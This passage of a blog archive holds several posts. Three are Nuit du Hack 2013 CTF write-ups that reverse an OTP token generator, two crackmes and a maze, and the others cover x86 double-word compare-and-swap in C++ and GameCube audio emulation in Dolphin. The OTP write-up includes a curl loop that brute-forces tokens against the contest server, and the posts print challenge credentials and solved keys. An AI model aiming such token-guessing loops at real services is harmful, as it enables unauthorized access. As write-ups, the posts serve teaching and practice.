
def extract_from_eeprom(addr):
    """Return the seed byte stored at address *addr* (0 to 15) as an int.

    Raises ValueError when *addr* is outside the 16-byte seed.
    """
    # Negative addresses must be rejected too: slicing would silently
    # accept them and read the wrong part of the seed.
    if not 0 <= addr <= 15:
        raise ValueError("SEED BAD ADDR : {0}".format(addr))
    # Each byte is two hex digits; int(..., 16) works on Python 2 and 3,
    # unlike str.decode('hex') which only exists on Python 2.
    return int(seed[addr * 2:(addr + 1) * 2], 16)


def get_eeprom_value_from_addr(addrs):
    """The blue Block: read the seed byte at each address of *addrs*."""
    return [extract_from_eeprom(addr) for addr in addrs]


def compute_2byte(b1, b2):
    """The Orange Block.

    Complement the 4 higher bits of each byte, keep the 4 lower bits
    unchanged, and xor the two resulting bytes together.
    """
    v1 = (b1 & 0xf) | ((0xff ^ b1) & 0xf0)
    v2 = (b2 & 0xf) | ((0xff ^ b2) & 0xf0)
    return v1 ^ v2
This new value is stored in the green block in four groups of two 4-bits flip-flops, and the previous operation is repeated four times to compute a final 4-bytes value.
def stock_intermediate_state(values):
    """The green block: store the intermediate bytes and expose them as a
    single dword.

    *values* is a list of bytes with the low byte first; the result is the
    32-bit complement of the dword they form.
    """
    # Byte number i lands 8 * i bits up, so the first byte is the lowest.
    dword = sum(byte << (8 * position) for position, byte in enumerate(values))
    return dword ^ 0xffffffff
The complemented value of the token is xored with the complement of this new value. This result is rotated by one to the right (rotation that we didn’t see for our first implementation, despite the fact that it was clearly written at the top…), stored in the yellow block as seen at the top of the article and displayed.
def apply_xor_with_previous(previous_token, interm_dword):
    """The red block.

    Xor the internal dword with NOT previous_token, then rotate the result
    by one bit: bit 31 is moved to bit 0 and every other bit moves up by
    one position, the whole being kept on 32 bits.
    """
    mixed = (previous_token ^ 0xffffffff) ^ interm_dword
    # Bit 31 is the one that wraps around to bit 0.
    wrapped_bit = 1 if mixed & 0x80000000 else 0
    return ((mixed << 1) & 0xffffffff) | wrapped_bit
The final code is available at the bottom of the article.
Now that we had our algorithm in Python, with the reference tokens given in the instructions, we could compute any token we wanted. We computed the number of tokens that separated the two given tokens and thus could find the index of the token at any given date after the first given token.
We used WolframAlpha to avoid messing-up timezones and timedeltas (we were traumatized by Codegate…) for the time computation. We computed the token at the index we thought but it didn’t work, then tried the 5 tokens below and above it but it didn’t work either. Okay, maybe they screwed the timezone, try the tokens one hour before and after, nope. Okay, you know what? screw this, compute 100 values before and 100 after the tokens and:
# Try each of the last 200 values printed by elec.py against the web page
# and stop at the first one that is not rejected.
for tok in `python2 elec.py | tail -200 | cut -d '-' -f 2`; do
    curl "http://z0b.nuitduhack.com:8001/?token=$tok" | grep 'Wrong token.'
    # $? is grep's status: 1 means 'Wrong token.' was not found in the reply.
    if [ "$?" -eq 1 ]; then echo FOUUUUUND: $tok; break; fi
done
And it worked, so I guessed we made a mistake in our computations of time-deltas.
#!/usr/bin/python2
# Software model of the OTP generator circuit.  The code below only uses
# constructs that behave the same under Python 2 and Python 3.

seed = "025EF87E7819E3A3B48E92CD92E7AB35"
previous_token = 0x0FDE45E3


def extract_from_eeprom(addr):
    """Return the seed byte stored at address *addr* (0 to 15) as an int.

    Raises ValueError when *addr* is outside the 16-byte seed.
    """
    # Negative addresses are rejected too: slicing would accept them and
    # silently read the wrong part of the seed.
    if not 0 <= addr <= 15:
        raise ValueError("SEED BAD ADDR : {0}".format(addr))
    # Two hex digits per byte; str.decode('hex') only exists on Python 2.
    return int(seed[addr * 2:(addr + 1) * 2], 16)


def get_eeprom_value_from_addr(addrs):
    """The blue block: read the seed byte at each address of *addrs*."""
    return [extract_from_eeprom(addr) for addr in addrs]


def compute_2byte(b1, b2):
    """The orange block.

    Complement the 4 higher bits of each byte, keep the 4 lower bits
    unchanged, and xor the two resulting bytes together.
    """
    v1 = (b1 & 0xf) | ((0xff ^ b1) & 0xf0)
    v2 = (b2 & 0xf) | ((0xff ^ b2) & 0xf0)
    return v1 ^ v2


def compute_addr_from_previous_token(previous_token):
    """The pink block.

    Returns in order the list of computed addresses from the previous
    token: one address per 4-bit group, lowest group first, each xored
    with a counter going from 0 to 7.

    Raises ValueError if previous_token does not fit in 32 bits.
    """
    # Explicit check rather than an assert, which -O would strip.
    if not 0 <= previous_token <= 0xffffffff:
        raise ValueError(
            "TOKEN OUT OF RANGE : {0}".format(previous_token))
    addrs = []
    for count in range(8):
        # Extract the 4 lowest bits of the token
        v = previous_token & 0xf
        previous_token >>= 4
        # Xor with the counter value
        addrs.append(v ^ count)
    return addrs


def stock_intermediate_state(values):
    """The green block: stores 4 bytes and uses them as a dword afterwards.

    Translated by taking a list of 4 bytes and outputting the complement
    as an int.
    """
    result = 0
    # Low byte is first
    for v in reversed(values):
        result = (result << 8) + v
    return 0xffffffff ^ result


def apply_xor_with_previous(previous_token, interm_dword):
    """The red block.

    Xor the internal dword with NOT previous_token, then rotate the result
    by one bit (bit 31 wraps around to bit 0).
    """
    not_previous_token = 0xffffffff ^ previous_token
    xored = not_previous_token ^ interm_dword
    # Rotation
    rot = 1 if xored & 0x80000000 else 0
    return ((xored << 1) & 0xffffffff) | rot


def next_token(previous_token):
    """Compute the token that follows *previous_token*."""
    # Addrs computed by pink part
    addrs = compute_addr_from_previous_token(previous_token)
    # Send addr to the eeprom
    values = get_eeprom_value_from_addr(addrs)
    # The orange part takes bytes 2-by-2 and outputs just one byte
    interm_byte = []
    for i in range(4):
        v1, v2 = values[i * 2:(i + 1) * 2]
        interm_byte.append(compute_2byte(v1, v2))
    # The green block just stores the intermediate computed bytes
    # and NOTs them in order to use them as a dword
    interm_dword = stock_intermediate_state(interm_byte)
    # The red block outputs the new token
    return apply_xor_with_previous(previous_token, interm_dword)


gen_per_min = (314.0/1346)
diff_min = 72348
diff = int(gen_per_min * diff_min)

for i in range(diff + 100):
    previous_token = next_token(previous_token)
    # print(<single expression>) prints the same text on Python 2 and 3.
    if previous_token == 0x7113aad3:
        print("FOUND: " + str(i) + " - " + hex(previous_token))
    if diff - 100 <= i <= diff + 100:
        print(str(i) + " : " + "{0:08x}".format(previous_token))
NDH2k13 crackme500 writeup
Reverse of a vm for finding the password Score 500 Link http://quals.nuitduhack.com/files/attachments/crackme.zip
The program was an ELF x86_64, statically linked executable. When launched, the crackme just prints some stuff, then asks for a password on the standard input and finally writes “Bad Password”.
When launching the command file on the crackme we first obtained the following response:
corrupted section header size
The same warning occurs with readelf in a more verbose way:
readelf: Warning: possibly corrupt ELF file header - it has a non-zero section header offset, but no section headers
IDA puts some warning too when opening the file even though it doesn’t impact it, however, gdb doesn’t like it at all and refuses to load the file.
Looking in the elf header we can see that the offset given for the section header offset was 1337, just put it all at 0 and everything goes back in order.
Now that this is fixed we can look into the code. The program starts with some init: just printing the first string and then initializing the vm.
After some time spent understanding how the vm worked I was able to find a comparison between two numbers; if the test failed the program printed “Bad Password” and exited. The first number was 9 and the second the size of my entry including the ‘\n’. So we now know that the password had 8 letters.
If the test was a success we entered in a loop which xored the value of the letters and a value at an address, and then compared them with an other value. When the test was a success the program continued, else it printed “Bad Password” and then exited. If all the tests were a success it printed “Good Password” and exited.
Dumping the values with which the letter xored we obtained:
0x12 0x21 0x02 0x19 0x25 0x34 0x29 0x11
And dumping the values they were compared against:
0x53 0x5b 0x4b 0x29 0x52 0x76 0x5a 0x49
In order to obtain the password in clear we just had to xor them and we obtained the key :
```text
AzI0wBsX
```
NDH2K13 crackme300 writeup
Connect to the remote machine and break the code. Oh wait, maybe you'll need some tools. Score 300 Link ssh://user:ndh2k13@z0b.nuitduhack.com:2222/
We are able to retrieve two files:
- an ELF asking for a password
- a vmlinux
Launching
crackme
on my box failed miserably. The code didn’t make any sense and the e_flags field of the ELF header which was supposed to be 0 was equal to 0x20.As we were provided with a vmlinux, I guessed the ELF loading routine of the kernel had been modified to check if e_flags was 0x20, and in this case apply some operation. When reversing
load_elf_binary
(fs/binfmt_elf.c
), you see that the code is xored. It can be fixed with the following code:#include <stdio.h> #define OFFSET (0x610) #define SIZE (0x418 + 0xe + 0x28) int main(int argc, char** argv) { char key[] = "\x12\x43\x34\x65\x78\xcf\xdc\xca\x98\x90" "\x65\x31\x21\x56\x83\xfa\xcd\x30\xfd\x12" "\x84\x98\xb7\x54\xa5\x62\x61\xf9\xe3\x09" "\xc8\x94\x12\xe6\x87"; FILE* f = fopen(argv[1], "r+"); char buf[SIZE]; fseek(f, OFFSET, SEEK_SET); fread(buf, 1, SIZE, f); for (int i = 0; i < SIZE; ++i) buf[i] = buf[i] ^ key[i % 35]; fseek(f, OFFSET, SEEK_SET); fwrite(buf, 1, SIZE, f); fclose(f); return 0; }
Now that we have a working ELF, we can look at it and see that it is quite straightforward to reverse. There may only be four different characters:
- w
- a
- s
- d
Looking closer, we can see that there are two globals, which begin at 0, and that must both be equal to 15 to have the right password. We can also see that there is a 16x16 table filled with ones and zeroes, and the globals (which are in fact the w and h positions in the table) must point to a 0 (it’s a maze, you must get from (0, 0) to (15, 15) without going through a wall).
The following python script finds the correct sequence of keys, which is the key:
#! /usr/bin/env python3
import sys

# 16x16 maze, stored row by row: 0x00 is a free cell, 0x01 is a wall.
TABLE = [
    0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01,
    0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01,
    0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01,
    0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,
    0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01,
    0x01, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01,
    0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01,
    0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00,
    0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x01,
    0x01, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x01,
    0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00,
    0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00,
    0x00, 0x00, 0x01, 0x01, 0x01, 0x01, 0x01, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
    0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00,
]

# Moves that may follow a given move: everything except the direct reverse.
CHARS = {
    "w": "wad",
    "s": "sad",
    "a": "was",
    "d": "wsd",
}


def get_counts(key):
    """Return the two counters reached after playing the moves in *key*.

    's' and 'w' respectively increment and decrement the first counter;
    'd' increments the second one and any other character decrements it.
    """
    n_s = key.count('s')
    n_w = key.count('w')
    n_d = key.count('d')
    # Whatever is not 's', 'w' or 'd' is handled like 'a'.
    n_other = len(key) - n_s - n_w - n_d
    return n_s - n_w, n_d - n_other


def test(key):
    """Depth-first search of the maze starting from the moves in *key*.

    Prints the key and exits the interpreter as soon as both counters are
    15.  Every partial key standing on a free cell is printed as well.
    Always returns False otherwise.
    """
    count_1, count_2 = get_counts(key)

    if (count_1, count_2) == (15, 15):
        print(key)
        sys.exit(0)

    # Out of the 16x16 grid: dead end.
    if not (0 <= count_1 <= 15 and 0 <= count_2 <= 15):
        return False

    # Standing on a wall: dead end.
    if TABLE[count_1 * 16 + count_2] != 0:
        return False

    print(key)
    for following in CHARS[key[-1:]]:
        test(key + following)
    return False


test("s")
Key is:
```text
ssddsssassdddssssdssaawaasssddddddwwwwwwddwwwwwdwwdddsssssaassssaasssddddwwddsss
```
Implementing generic double-word compare and swap for x86/x86-64
Most lock-free data structures rely on atomic compare and swap (CAS) operation and in order to solve ABA issue the CAS must work on a double word (a pointer and a counter.) Implementing such kind of pointer is often tedious and error prone. In particular, for Intel x86, 32bit and 64bit code use a different mnemonic. This article present a template based implementation that hides the hard stuff.
Since the introduction of multi-core processors, parallel computing is growing in attention. While lock-based techniques have been studied for a long time, modern HPC require more scalable data structures. Lock-free data structures have proven better scaling by avoiding thread blocking.
But avoiding locks introduces new issues, among which the so-called ABA problem (see next section.) There exists various strategy to avoid this issue, and among all the use of atomic CAS on double word pointers seems the less intrusive one (other choices may rely on aspect that may not be available in all context: garbage collector or Load-Link/Store-Condition for example.)
Implementing a double-word CAS is tedious, you have to inline some assembly code and most of all your code is word size dependent. Here is a simple solution to implement such a CAS with gcc-style inline assembly and C++ template for x86 and x86-64 processors.
But, let’s start with quick description of the ABA problem.
The ABA problem
Classical lock-free data structures often use a simple retry-strategy based on the idea that one fetch the desired pointer, access inner data and then try to update the pointer in the structure, if the pointer has changed since we fetch it, the algorithm simply retry by fetching it again.
The ABA issue may appear when a change to the pointer is not visible by simply reading the address. Let’s see the scenario:
- Thread 0 access the pointer in the structure and read address A
- Thread 1 change the pointer with address B and invalidate address A
- Thread 2 (or Thread 1) allocate a new cell at address A and again update the main pointer and write A
- Thread 0 test the pointer (with a CAS) and find A, since the pointer doesn’t seem to have changed, it will silently consider that nothing has changed.
If the first thread has already read content of the cell, this content will be out-of-date.
To prevent this issue, we have several strategies. Most strategies rely on different memory management approach such as garbage collection (in a garbage collected paradigm, the cell at address A won’t be invalidate since it is hold by someone, and thus it can’t be reused.)
But garbage collection introduces more parallel issues and requires some sort of language integration. It is acceptable when it is already part of the environment (like in Java), but you don’t want it when building high-performance application in less high-level languages (such as C/C++.)
Other solutions based on transactional memory or LL/SC operations have other drawback such as hardware requirements that are not standard.
Double-word CAS
A simpler way to solve the ABA issue, used for example in the article from Michael and Scott, Simple, Fast, and Practical Non-Blocking and Blocking Concurrent Queue Algorithms, is to replace your pointer by a pair with a pointer and a counter.
The strategy is simple, each time the pointer is changed the counter is incremented, thus even if the address is the same the counter value will differ.
The only remaining issue is how to perform a double word CAS ?
Atomic CAS requires processor’s specific instructions, on the x86/x86-64 processors you’ll find that the CAS instruction is named cmpxchg.
But, as usual, this instruction has various versions depending on the size of the value to swap. So, if you want a double-word CAS for 32bit wide pointers, you’ll use cmpxchg8b and cmpxchg16b for 64bit wide pointers.
Note: GCC provides atomic operations, but these operations are limited to integral types, that is types with size less (or equal) to 8 bytes, but we need 16 bytes wide CAS.
Using cmpxchg for 32bit wide pointers
So, let’s start with the easy case: 32bit wide pointers. It’s easy because you have 64bit integral types (here we need some unsigned integer) directly defined.
The double-word CAS will look like that:
// Double-word (64-bit) compare-and-swap built on `lock cmpxchg8b`.
//
// Atomically compares *adr with cmp; when they are equal, *adr is replaced
// by nval.  In every case the value *adr held before the operation is
// returned, so the swap happened if and only if the result equals cmp.
uint64_t cas(uint64_t* adr, uint64_t nval, uint64_t cmp)
{
  // cmpxchg8b takes the expected value in edx:eax and, on mismatch, loads
  // the current memory content into that same pair.  Both halves are
  // therefore read-write operands.
  uint32_t lo = (uint32_t)(cmp & 0xffffffff);
  uint32_t hi = (uint32_t)(cmp >> 32);
  __asm__ __volatile__(
    "lock cmpxchg8b %2\n\t"          // %2 is the memory operand
    : "+a" (lo), "+d" (hi)
      ,"+m" (*adr)
    : "c" ((uint32_t)(nval >> 32)), "b" ((uint32_t)(nval & 0xffffffff))
    : "cc", "memory"                 // keep memory accesses ordered around the CAS
    );
  return ((uint64_t)hi << 32) | lo;
}
Note: the previous code is doing some supposition upon the memory layout of the unsigned integer.
The cmpxchg8b atomically compare the given 8 bytes with the given values (in d and a), if the values matches it replaces the old value with the new one. In any case it returns the old value.
You may have notice the lock prefix. While cmpxchg8b is guaranteed to be atomic, the instruction doesn’t implies any memory barrier: re-ordering of fetch and store operations by the processor are not required to be consistent with the relative ordering of the instructions flow (so write operations lexically before the cmpxchg8b can actually take place after the CAS itself.) But, and this is more important, other processors may change the memory state during the execution of the cmpxchg8b ! The lock prefix enforce a global memory barrier (for the current processor but also for the other.) It also force cache line invalidation so other attempt to read the memory cell will require a real fetch in memory.
Why the memory barrier is not the default behavior of an atomic operation ? The memory barrier have a cost, and in some situation it is not required, thus it is simpler to provide the barrier as an option rather than a default behavior.
And a 64bit version ?
At first, it seems logical to simply replace cmpxchg8b by cmpxchg16b in the previous code to obtain a double-word CAS for 64bit wide pointers, no?
Of course not, we don’t have a 128bits wide integer type (some compiler may provide such a type) so we have to embedded our pair in a struct (we’ll see the code later in the template version.) Beware that cmpxchg16b requires a memory operand aligned on 16 bytes boundaries.
But that’s not all. In the previous version, the CAS operation returns the old value, which is then often used to test if the operation has succeed or not. But, the compiler won’t let us simply compare structures like integers.
Fortunately, cmpxchg16b (like cmpxchg8b and cmpxchg) sets an arithmetic flag indicating whether the operation has succeeded or not! Thus, we only have to do a setz to some Boolean-like value.
Taking everything together:
- we need a struct holding our pair (in fact we probably have it already)
- our compare and swap will return a Boolean value
- depending on the pointer size we should use cmpxchg8b or cmpxchg16b
Now, how can we have a unified code size dependent ?
Using template
In order to switch upon the size of pointer, we’ll use template.
Let see the code:
// Pointer + modification counter, updated as a single unit by a
// double-word compare-and-swap.
//
// Primary template: the pair is swapped with cmpxchg8b, i.e. it is meant
// for targets where the pointer and the counter are 4 bytes each.
// The integer parameter N is only used to select the specialization.
template<typename T,unsigned N=sizeof (uint32_t)>
struct DPointer {
public:
  union {
    uint64_t ui;              // the pair seen as one value, for the asm
    struct {
      T* ptr;
      size_t count;
    };
  };

  DPointer() : ptr(NULL), count(0) {}
  DPointer(T* p) : ptr(p), count(0) {}
  DPointer(T* p, size_t c) : ptr(p), count(c) {}

  // Atomically replace *this by nval if *this equals cmp.
  // Returns true when the swap took place.
  bool cas(DPointer<T,N> const& nval, DPointer<T,N> const & cmp)
  {
    bool result;
    // On failure cmpxchg8b overwrites edx:eax with the current memory
    // content, so the expected value lives in local read-write operands
    // instead of being declared as read-only inputs.
    T* expected_ptr = cmp.ptr;
    size_t expected_count = cmp.count;
    __asm__ __volatile__(
      "lock cmpxchg8b %1\n\t"
      "setz %0\n"               // ZF is set when the swap happened
      : "=q" (result)
        ,"+m" (ui)
        ,"+a" (expected_ptr), "+d" (expected_count)
      : "b" (nval.ptr), "c" (nval.count)
      : "cc", "memory"
      );
    return result;
  }

  // We need == to work properly
  bool operator==(DPointer<T,N> const&x) const { return x.ui == ui; }
};

// Specialization for 8-byte pointers: the pair is 16 bytes wide and is
// swapped with cmpxchg16b, which needs a 16-byte aligned memory operand.
template<typename T>
struct DPointer <T,sizeof (uint64_t)> {
public:
  union {
    uint64_t ui[2];           // the pair seen as one 16-byte object
    struct {
      T* ptr;
      size_t count;
    } __attribute__ (( __aligned__( 16 ) ));
  };

  DPointer() : ptr(NULL), count(0) {}
  DPointer(T* p) : ptr(p), count(0) {}
  DPointer(T* p, size_t c) : ptr(p), count(c) {}

  // Atomically replace *this by nval if *this equals cmp.
  // Returns true when the swap took place.
  bool cas(DPointer<T,8> const& nval, DPointer<T,8> const& cmp)
  {
    bool result;
    // On failure cmpxchg16b overwrites rdx:rax with the current memory
    // content, so the expected value lives in local read-write operands.
    T* expected_ptr = cmp.ptr;
    size_t expected_count = cmp.count;
    __asm__ __volatile__ (
      "lock cmpxchg16b %1\n\t"
      "setz %0\n"               // ZF is set when the swap happened
      : "=q" ( result )
        ,"+m" ( ui )
        ,"+a" ( expected_ptr ), "+d" ( expected_count )
      : "b" ( nval.ptr ), "c" ( nval.count )
      : "cc", "memory"
      );
    return result;
  }

  // We need == to work properly
  bool operator==(DPointer<T,8> const&x) const
  {
    return x.ptr == ptr && x.count == count;
  }
};
The first trick is to use an anonymous union (and an anonymous struct) in order to have direct access to the pointer and the counter, and direct access to the value as a whole for the assembly code. In fact, we could probably have done without it, but it is simpler to read like that.
As you can see, the template has an integer parameter (that is not used) and is specialized upon it (for N=8.) Now, when you want to use our pointer, all you have to do is to instantiate our template with N=sizeof (void*).
An Example
Here is a quick’n’dirty implementation of the non-blocking concurrent queue described in the article by Michael and Scott.
// Non-blocking FIFO queue built on DPointer (pointer + counter pairs updated
// with cas()).  Head always designates a placeholder node: the constructor
// allocates one, and take() returns the value stored in the node *after*
// Head, which then becomes the new placeholder.
template<typename T>
class Queue {
public:
  struct Node;
  typedef DPointer<Node,sizeof (size_t)> Pointer;

  // Singly linked node; `next` carries its own counter.
  struct Node {
    T value;
    Pointer next;
    Node() : next(NULL) {}   // placeholder node: `value` is left default-initialized
    Node(T x, Node* nxt) : value(x), next(nxt) {}
  };

  Pointer Head, Tail;

  // Start with a single placeholder node shared by Head and Tail.
  Queue() {
    Node *node = new Node();
    Head.ptr = Tail.ptr = node;
  }

  void push(T x);
  bool take(T& pvalue);
};

// Append a copy of `x` at the tail of the queue.
template<typename T>
void Queue<T>::push(T x) {
  Node *node = new Node(x,NULL);
  Pointer tail, next;
  do {
    // Snapshot Tail and its successor.
    // NOTE(review): these are plain member-wise copies, not atomic loads;
    // the `tail == Tail` re-check below is what guards against a stale
    // snapshot -- confirm this is sufficient on the target.
    tail = Tail;
    next = tail.ptr->next;
    if (tail == Tail) {
      if (next.ptr == NULL) {
        // Tail really was the last node: try to link the new node after it.
        if (tail.ptr->next.cas(Pointer(node,next.count+1),next))
          break;
      } else {
        // Tail is lagging behind: try to advance it, then retry.
        Tail.cas(Pointer(next.ptr,tail.count+1), tail);
      }
    }
  } while (true);
  // Try to swing Tail to the inserted node; the result is ignored, the
  // lagging-Tail branches in push()/take() advance it otherwise.
  Tail.cas(Pointer(node,tail.count+1), tail);
}

// Remove the oldest element and store it in `pvalue`.
// Returns false (leaving `pvalue` untouched) when the queue is empty.
template<typename T>
bool Queue<T>::take(T& pvalue) {
  Pointer head, tail, next;
  do {
    head = Head;
    tail = Tail;
    next = head.ptr->next;
    // Note: the `else` below binds to the inner `if`.
    if (head == Head)
      if (head.ptr == tail.ptr) {
        // Only the placeholder is reachable from Head.
        if (next.ptr == NULL)
          return false;
        // A node was linked but Tail was not advanced yet: help it along.
        Tail.cas(Pointer(next.ptr,tail.count+1), tail);
      } else {
        // Read the value before the CAS: once Head moves, `next` becomes the
        // placeholder and may be deleted by another take().
        pvalue = next.ptr->value;
        if (Head.cas(Pointer(next.ptr,head.count+1), head))
          break;
      }
  } while (true);
  // NOTE(review): the old placeholder is freed immediately; another thread
  // that copied Head earlier may still dereference head.ptr->next -- confirm
  // that reclamation is safe (a free list or deferred reclamation may be needed).
  delete(head.ptr);
  return true;
}
Going further
There are some possible enhancements to our pointer template:
- Our assembly code doesn’t support -fPIC relocation: by convention, ebx is supposed to be preserved in each block of code, so we have to back up its value before using it in the inline asm block.
- Not all operations are done atomically; to have a more complete implementation, we should override some operators.
Emulating the Gamecube audio processing in Dolphin
For the last two weeks, I’ve been working on enhancements and bug fixes related to audio processing in the Dolphin Emulator (the only Gamecube/Wii emulator that allows playing commercial games at the moment). Through this project I have learned a lot about how audio processing works in a Gamecube. Very little documentation is available on that subject, so I think writing an article explaining how it works might teach some new things to people interested in Gamecube/Wii homebrew development or emulators development. This article was first published in 3 parts on the Dolphin official forums. Before publishing it on the blog, I made some small changes (mostly proof-reading and adding some complementary images) but most explanations are the same.
If you’re interested in the code, it is available in the
new-ax-hle
branch on the official Google Code repository. Let’s start this exploration of audio emulation in a Gamecube emulator by looking at how the real hardware processes sound data.
How sound is processed in a Gamecube
There are three main internal components related to sound in a Gamecube: the ARAM, the AI and the DSP:
- ARAM is an auxiliary memory which is used to store sound data. The CPU cannot access ARAM directly, it can only read/write blocks of data from RAM to ARAM (or from ARAM to RAM) using DMA requests. As ARAM is quite large, games often use it to store more than sound data: for example, WWE Day of Reckoning 2 uses it to store animation data (and a bug in DMA handling causes a crash because the data it writes is corrupted).
- The AI (Audio Interface) is responsible for getting sound data from RAM and sending it to your TV. It performs an optional sample rate conversion (32KHz -> 48KHz) and converts the data to an analog signal that is sent through the cables to your audio output device. The input data is read at a regular interval from RAM (not ARAM), usually every 0.25ms 32 bytes of input data is read (each sound sample is 2 bytes, so 32 bytes is 16 sound samples, which is 8 stereo sound samples, and 8 samples every 0.25ms == 32KHz sound).
- The DSP is what processes all the sounds a game wants to play and outputs a single stereo stream. Its job is to perform volume changes on the sounds, sample rate conversion (converting 4KHz sounds which take less space to 32KHz sounds - this is needed because you can’t mix together sounds that are not the same rate). It can optionally do a lot of other stuff with the sounds (delaying to simulate 3D sound, filtering, handling surround sound, etc.).
Figure 1: Overview of all the components involved in audio processing in a Gamecube
ARAM and AI are not that hard to emulate: once you understand how they work, they are both simple chips which can only perform one function and don’t communicate a lot with the CPU. You just need to have a precise enough timing for AI emulation, and everything is fine.
DSP is a lot harder to emulate properly, for two reasons I have not mentioned yet. First, it is a programmable CPU. All the mixing, filtering, etc. are part of a program that is sent to the DSP by the game, and the DSP behavior varies depending on the program it receives. For example, the DSP is not only used for sound processing, but also to unlock memory cards, and to cipher/decipher data sent to a GBA using the official link cable. Even for sound processing, not every game uses the same DSP code. The second reason is that it can communicate with the main Gamecube CPU, read RAM and ARAM and write to RAM. This allows games to use a complicated communication protocol between CPU and DSP.
We call a program running on the DSP a UCode (“microcode”). Because the DSP is programmable, it would seem like the only way to emulate it properly is to use low level emulation: running instructions one by one from a program to reproduce accurately what the real DSP does. However, while it is programmable, there are actually very few different UCodes used by games. On Gamecube, there are only 3 UCodes we know of: the AX UCode (used in most games because it is distributed with Nintendo’s SDK), the Zelda UCode (called that way because it’s used in Zelda games, but it is also used for some Mario games and some other first party games), and the JAC UCode (early version of the Zelda UCode, used in the Gamecube IPL/BIOS as well as Luigi’s Mansion). That means if we can reproduce the behavior of these three UCodes, we can emulate the audio processing in most games without having to emulate the DSP instructions.
I started working on AX HLE 3 weeks ago because I want to play Skies of Arcadia Legends and Tales of Symphonia, two games that had completely broken audio with the previous AX HLE implementation. I added a new hack to “fix” the bug that caused bad music emulation, but fixing this made me even more interested in rewriting the whole thing to make it cleaner. I wasn’t following Dolphin development when the current AX HLE was developed. However, it looks to me as if it was written without actually looking at the DSP code, only looking at what is sent to the DSP and what comes out. I don’t know if people at the time had the capability to disassemble DSP code, but it is a very bad way to emulate AX anyway: some parts of the emulation code are completely WTF, and the more you understand how AX works the less you understand how the current AX HLE emulation was able to work and output sound in most cases. That’s why, two weeks ago I decided I should start from scratch and re-implement AX HLE.
AX UCode features and internals
AX is a low-level audio library for Gamecube games, which comes with a builtin UCode to perform audio signal processing on the DSP. I’ll first talk about what it can do, then explain how the UCode knows what it should do.
Luckily, Nintendo gives us a lot of information about the role of the DSP in a patent filed on Aug 23 2000: US7369665, “Method and apparatus for mixing sound signals”. Figures 8, 9A and 9B are especially interesting in our case because they describe precisely what the DSP does internally and how inputs and outputs interact with each other. That helps, but most of this information could already be discovered by reverse engineering the UCode anyway (I learned the existence of this patent pretty late).
The basic role of the DSP is to get several sounds and mix them together to give a single sound. The sounds that it has to mix are provided through a list of Parameter Blocks (PB). Each PB corresponds to a sound to be mixed. It contains where to find the input sound data, but also a lot of configuration options: input sample rate, sound volume, where it should be mixed and at what volume (left channel/right channel/surround), if the sounds loop, from where does the loop start, etc.
Figure 2: List of PBs with example fields. The PBADDR AX command gives the address of the first PB to the DSP.
Every 5ms AX gets a list of PB and mixes each PB to 3 channels: Left, Right and Surround. It then sends 5ms of output to the RAM, at an address provided by the CPU. Sometimes being able to change sound data only every 5ms is not enough: to overcome that, each PB has a list of updates to be applied every millisecond. This allows sub-5ms granularity in sound mixing configuration. AX also provides a way to add audio effects on the L/R/S streams through the use of AUX channels. Each PB can be mixed to L/R/S but also to AUXA L/R/S and AUXB L/R/S. Then, the CPU can ask to get the contents of the AUXA and AUXB mixing buffers, replace them with its own data, and ask the DSP to mix AUXA and AUXB with the main L/R/S channels.
That’s about it for the main features of AX. Some more things can be done optionally (for example Initial Time Delay, used to delay one channel to simulate 3D sound) but they are not used that often by games. Let’s see how the CPU sends commands to the DSP.
The DSP has two ways to communicate with the game: through DMA, which allows it to read or write to RAM at any address it wants, and through mailbox registers, which is a more synchronous way to exchange small amounts of data (32 bits at a time) with the CPU. Usually, mailbox registers are used for synchronization and simple commands. For more complicated commands the CPU sends an address to the DSP via mailbox, and the DSP gets the data at this address through DMA.
With AX, about the only thing received through mailboxes (excluding UCode switching stuff which is not relevant to sound processing) is an address to a larger block of data which contains commands for the DSP. Here are a few commands that AX understands and that I have reverse engineered:
- Command 00:
SETUP
, initializes internal mixing buffers with a constant value or a value and a delta. Usually just initializes to 0. - Command 02:
PBADDR
, gives the DSP the address in RAM of the first PB. Each PB contains the address of the next PB, so knowing only the address of the first PB is enough to get the whole list. - Command 03:
PROCESS
